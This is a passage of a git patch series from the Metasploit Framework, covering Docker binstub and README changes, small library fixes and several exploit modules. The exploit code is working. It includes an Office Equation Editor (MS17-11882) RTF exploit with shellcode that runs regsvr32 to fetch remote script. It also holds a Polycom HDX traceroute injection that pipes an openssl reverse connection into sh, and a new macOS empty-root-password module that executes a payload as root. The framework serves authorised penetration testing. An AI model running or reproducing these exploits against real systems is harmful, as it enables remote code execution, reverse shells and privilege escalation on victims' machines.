-ln -s `pwd`/docker/bin/msfvenom $HOME/bin/ +./docker/bin/msfvenom ``` -If you set the environment variable `MSF_BUILD` the container will be rebuilt. - -```bash -MSF_BUILD=1 ./docker/bin/msfconsole -MSF_BUILD=1 ./docker/bin/msfconsole-dev -``` +You can pass any command line arguments to the binstubs or the docker-compose command and they will be passed to `msfconsole` or `msfvenom`. If you need to rebuild an image (for example when the Gemfile changes) you need to build the docker image using `docker-compose build` or supply the `--rebuild` parameter to the binstubs. ### But I want reverse shells... -By default we expose port `4444`. You'll need to set `LHOST` to be a hostname/ip -of your host machine. +By default we expose port `4444`. If you want to expose more ports, or have `LHOST` prepopulated with a specific value; you'll need to setup a local docker-compose override for this. -Create `docker/docker-compose.local.override.yml` with: +Create `docker-compose.local.override.yml` with: ```yml -version: '2' +version: '3' services: ms: environment: @@ -56,19 +49,6 @@ Now you need to set the `COMPOSE_FILE` environment variable to load your local override. ```bash -echo "COMPOSE_FILE=./docker-compose.yml:./docker/docker-compose.local.override.yml" >> .env +echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env ``` Now you should be able get reverse shells working - -## Developing - -To setup you environment for development, you need to add `docker/docker-compose.development.override.yml` -to your `COMPOSE_FILE` environment variable. - -If you don't have a `COMPOSE_FILE` environment variable, you can set it up with this: - -```bash -echo "COMPOSE_FILE=./docker-compose.yml:./docker/docker-compose.development.override.yml" >> .env -``` - -Alternatively you can also use the `msfconsole-dev` binstub. diff --git a/docker/bin/msfconsole b/docker/bin/msfconsole index a6b0b722f7..b85d150546 100755 --- a/docker/bin/msfconsole +++ b/docker/bin/msfconsole @@ -19,8 +19,12 @@ fi cd $MSF_PATH -if [[ -n "$MSF_BUILD" ]]; then - docker-compose -f $MSF_PATH/docker-compose.yml build +PARAMS="$@" + +if [[ $PARAMS == *"--rebuild"* ]]; then + echo "Rebuilding image" + docker-compose build + exit $? fi -docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$@" +docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$PARAMS" diff --git a/docker/bin/msfconsole-dev b/docker/bin/msfconsole-dev deleted file mode 100755 index 69cf879975..0000000000 --- a/docker/bin/msfconsole-dev +++ /dev/null @@ -1,27 +0,0 @@ -#! /bin/bash - -if [[ -z "$MSF_PATH" ]]; then - path=`dirname $0` - - # check for ./docker/msfconsole.rc - if [[ ! -f $path/../msfconsole.rc ]] ; then - - # we are not inside the project - realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;} - - # determine script path - pushd $(dirname $(realpath $0)) > /dev/null - path=$(pwd) - popd > /dev/null - fi - MSF_PATH=$(dirname $(dirname $path)) -fi - -cd $MSF_PATH - -if [[ -n "$MSF_BUILD" ]]; then - docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build -fi - -docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$@" - diff --git a/docker/bin/msfvenom b/docker/bin/msfvenom index 3efc05168d..dd0f96cd49 100755 --- a/docker/bin/msfvenom +++ b/docker/bin/msfvenom @@ -17,9 +17,15 @@ if [[ -z "$MSF_PATH" ]]; then MSF_PATH=$(dirname $(dirname $path)) fi -if [[ -n "$MSF_BUILD" ]]; then - docker-compose -f $MSF_PATH/docker-compose.yml build +cd $MSF_PATH + +PARAMS="$@" + +if [[ $PARAMS == *"--rebuild"* ]]; then + echo "Rebuilding image" + docker-compose build + exit $? fi -cd $MSF_PATH -docker-compose run --rm --service-ports ms ./msfvenom "$@" +# we need no database here +docker-compose run --rm --no-deps ms ./msfvenom "$PARAMS" diff --git a/docker/bin/msfvenom-dev b/docker/bin/msfvenom-dev deleted file mode 100755 index 32b1049748..0000000000 --- a/docker/bin/msfvenom-dev +++ /dev/null @@ -1,26 +0,0 @@ -#! /bin/bash - -if [[ -z "$MSF_PATH" ]]; then - path=`dirname $0` - - # check for ./docker/msfconsole.rc - if [[ ! -f $path/../msfconsole.rc ]] ; then - - # we are not inside the project - realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;} - - # determine script path - pushd $(dirname $(realpath $0)) > /dev/null - path=$(pwd) - popd > /dev/null - fi - MSF_PATH=$(dirname $(dirname $path)) -fi - -cd $MSF_PATH - -if [[ -n "$MSF_BUILD" ]]; then - docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build -fi - -docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@" diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index e37a16a350..edccdb50cd 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1826,6 +1826,8 @@ class Db if (path) auth, dest = path.split('@') (dest = auth and auth = nil) if not dest + # remove optional scheme in database url + auth = auth.sub(/^\w+:\/\//, "") if auth res[:user],res[:pass] = auth.split(':') if auth targ,name = dest.split('/') (name = targ and targ = nil) if not name From 0d38b7076390825a4b1a97afd25788e0907529ca Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 28 Nov 2017 21:59:26 +0100 Subject: [PATCH 210/254] make travis build the image again --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index ffcbff526b..5d4166a1b4 100644 --- a/.travis.yml +++ b/.travis.yml @@ -25,7 +25,7 @@ matrix: jobs: # build docker image include: - - env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" DOCKER="true" + - env: CMD="docker-compose build" DOCKER="true" # we do not need any setup before_install: skip install: skip From 7b3bf85d0315988c0525194606c57d4c8d45ab67 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 28 Nov 2017 16:00:28 -0600 Subject: [PATCH 211/254] Print the generated command stager for debugging --- lib/msf/core/exploit/cmdstager.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb index 11c29a5c32..59e77b92f2 100644 --- a/lib/msf/core/exploit/cmdstager.rb +++ b/lib/msf/core/exploit/cmdstager.rb @@ -137,6 +137,8 @@ module Exploit::CmdStager raise ArgumentError, 'The command stager could not be generated' end + vprint_status("Generated command stager: #{cmd_list.join}") + cmd_list end From f132c1572f251848472031ee28086cf9e671e179 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 28 Nov 2017 17:15:56 -0600 Subject: [PATCH 212/254] Fix #9194, clarified error for reloading modules --- lib/msf/ui/console/command_dispatcher/modules.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/modules.rb b/lib/msf/ui/console/command_dispatcher/modules.rb index a7a8c806f8..bbb1993c29 100644 --- a/lib/msf/ui/console/command_dispatcher/modules.rb +++ b/lib/msf/ui/console/command_dispatcher/modules.rb @@ -99,7 +99,7 @@ module Msf print_status("Reloading #{path}") load path else - print_error('Only Ruby files can be reloaded') + print_error('Only Ruby files can be reloaded (use reload/rerun for modules)') end else print_error('Nothing to edit -- try using a module first.') From cb7f173811af79d7b8393bd2cfa33a46488e7e1f Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 28 Nov 2017 21:36:25 -0500 Subject: [PATCH 213/254] Update office_ms17_11882.rb --- .../windows/fileformat/office_ms17_11882.rb | 160 +++++++++++------- 1 file changed, 103 insertions(+), 57 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index f87d1032fb..47d486f734 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Powershell include Msf::Exploit::EXE + include Msf::Exploit::FILEFORMAT def initialize(info = {}) @@ -38,6 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Payload' => { 'DisableNops' => true }, + 'Stance' => Msf::Exploit::Stance::Aggressive, 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' @@ -55,54 +57,107 @@ class MetasploitModule < Msf::Exploit::Remote header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata ' - header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' - header << '0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400720079000000000000000000000000000000000000000000000000000000' - header << '00000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020ce' - header << 'a5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000' - header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000' - header << '000000000000001400000000000000010043006f006d0070004f0062006a0000000000000000000000000000000000000000000000000000000000000000000000' - header << '0000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000' - header << '0001000000660000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000' - header << '00000000000000000000000012000201ffffffff04000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000003' - header << '0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffff0100000208000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - header << '00000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' - header << '71756174696f6e000b0000004571756174696f6e2e3300f439b2710000000000000000000000000000000000000000000000000000000000000000000000000000' - header << "00000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\n" + header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000' + header << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' + header << '09000600000000000000000000000100000001000000000000000010000002000' + header << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040' + header << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0' + header << '07400720079000000000000000000000000000000000000000000000000000000' + header << '00000000000000000000000000000000000016000500ffffffffffffffff02000' + header << '00002ce020000000000c0000000000000460000000000000000000000008020ce' + header << 'a5613cd30103000000000200000000000001004f006c006500000000000000000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '000000000000001400000000000000010043006f006d0070004f0062006a00000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '0000000000000000000000000000120002010100000003000000ffffffff00000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '0001000000660000000000000003004f0062006a0049006e0066006f000000000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '00000000000000000000000012000201ffffffff04000000ffffffff000000000' + header << '00000000000000000000000000000000000000000000000000000000000000003' + header << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060' + header << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffff01000002080000000000000000000000000000000000000000000000000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000' + header << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' + header << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << "00000300040000000000000000000000000000000000000000000000000000000" + header << "000000000000000000000000000000000000000000000000000000000000000\n" + + + shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00" + shellcode << "\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ" + shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09" + shellcode << "\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53" + shellcode << "\x66\x83\xEE\x4C\xFF\x10\x90\x90" footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - footer << '4500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000' - footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000400' - footer << '0000C50000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000' - footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - footer << '0000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000' - footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - footer << '000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000' - footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C' - footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C0000000000050000000902000000000500000002' + footer << '4500710075006100740069006F006E0020004E006100740069007600650000000' + footer << '00000000000000000000000000000000000000000000000000000' + footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000400' + footer << '0000C5000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00' + footer << '000000000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000000000' + footer << '000000000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF' + footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000001050000050000000D0000004D45544146494C' + footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C' + footer << '500000002001C0000000000050000000902000000000500000002' footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF' footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090' footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016' @@ -123,9 +178,6 @@ class MetasploitModule < Msf::Exploit::Remote footer << "}}}\n" footer << '\par}' + "\n" - shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ" - shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10" - shellcode << "\x90\x90" payload = shellcode payload += [0x00402114].pack("V") @@ -133,13 +185,7 @@ class MetasploitModule < Msf::Exploit::Remote payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll" payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first payload = header + payload + footer - - path = ::File.join(Msf::Config.local_directory, datastore['FILENAME']) - ::File.open(path, 'wb') do |fd| - fd.write(payload) - fd.close - end - print_good("Wrote payload to #{path}") + payload end @@ -207,6 +253,6 @@ class MetasploitModule < Msf::Exploit::Remote def primer - generate_rtf + file_create(generate_rtf) end end From 2544b4d8db4b4cad4af2d312bb32a8cde13fff88 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 28 Nov 2017 21:39:04 -0500 Subject: [PATCH 214/254] Change target name --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 47d486f734..37f096f7ac 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ - ['Automatic', {} ], + ['Microsoft Office Word', {} ], ], 'DefaultTarget' => 0, 'Payload' => { From 676a08b84999251806d6310521875db16e487de4 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 28 Nov 2017 22:01:41 -0500 Subject: [PATCH 215/254] Update polycom_hdx_traceroute_exec.rb --- modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb index fdd6474c2c..033d433d37 100644 --- a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb +++ b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb @@ -105,7 +105,6 @@ class MetasploitModule < Msf::Exploit::Remote # Figure out the port we picked cbport = self.service.getsockname[2] - # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128 cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n" sock.put(cmd) if datastore['VERBOSE'] From 3fff092042c07b23e16ff5fc8c39741f4cac3157 Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Tue, 28 Nov 2017 21:37:25 -0600 Subject: [PATCH 216/254] Fix include scope in external module mixin The auxiliary report mixin overrides some of the methods in Metasploit::Credential, which is fine in framework, but causes issues in projects relying on the base behavior of Metasploit::Credential. This changes the include scope from global to just whatever includes the external module mixin. --- lib/msf/core/module/external.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/module/external.rb b/lib/msf/core/module/external.rb index 4c08d5a4e2..d90c9cbfed 100644 --- a/lib/msf/core/module/external.rb +++ b/lib/msf/core/module/external.rb @@ -1,6 +1,6 @@ -include Msf::Auxiliary::Report - module Msf::Module::External + include Msf::Auxiliary::Report + def wait_status(mod) begin while mod.running From 7f1f7281f128ec06b32415aa7d4c801ba0cb5892 Mon Sep 17 00:00:00 2001 From: Tim W Date: Wed, 29 Nov 2017 16:06:02 +0800 Subject: [PATCH 217/254] add local exploit for osx root login with no password --- .../exploits/osx/local/root_no_password.rb | 55 +++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 modules/exploits/osx/local/root_no_password.rb diff --git a/modules/exploits/osx/local/root_no_password.rb b/modules/exploits/osx/local/root_no_password.rb new file mode 100644 index 0000000000..2a0031c258 --- /dev/null +++ b/modules/exploits/osx/local/root_no_password.rb @@ -0,0 +1,55 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Mac OS X Root Privilege Escalation', + 'Description' => %q{ + This module exploits a serious flaw in MacOSX High Sierra. + Any user can login with user "root", leaving an empty password. + }, + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ], + [ 'URL', 'https://news.ycombinator.com/item?id=15800676' ], + [ 'URL', 'https://forums.developer.apple.com/thread/79235' ], + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'DefaultOptions' => + { + 'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp', + }, + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [ + [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Wed 29 2017' + )) + end + + def exploit_cmd(root_payload) + "osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'" + end + + def exploit + payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" + print_status("Writing payload file as '#{payload_file}'") + write_file(payload_file, payload.raw) + register_file_for_cleanup(payload_file) + output = cmd_exec("chmod +x #{payload_file}") + print_status("Executing payload file as '#{payload_file}'") + cmd_exec(exploit_cmd(payload_file)) + end +end From 58897bf2fc3c1433c2bcd610955cda7611ac5755 Mon Sep 17 00:00:00 2001 From: Tim W Date: Wed, 29 Nov 2017 16:36:50 +0800 Subject: [PATCH 218/254] msftidy --- modules/exploits/osx/local/root_no_password.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/osx/local/root_no_password.rb b/modules/exploits/osx/local/root_no_password.rb index 2a0031c258..2fc91f8fe7 100644 --- a/modules/exploits/osx/local/root_no_password.rb +++ b/modules/exploits/osx/local/root_no_password.rb @@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Local [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ] ], 'DefaultTarget' => 0, - 'DisclosureDate' => 'Wed 29 2017' + 'DisclosureDate' => 'Nov 29 2017' )) end From efa8d566d7430183975922bebcca6f0bb2323e2f Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Wed, 29 Nov 2017 10:26:06 -0600 Subject: [PATCH 219/254] Added documentation for iamroot --- .../exploit/osx/local/root_no_password.md | 104 ++++++++++++++++++ 1 file changed, 104 insertions(+) create mode 100644 documentation/modules/exploit/osx/local/root_no_password.md diff --git a/documentation/modules/exploit/osx/local/root_no_password.md b/documentation/modules/exploit/osx/local/root_no_password.md new file mode 100644 index 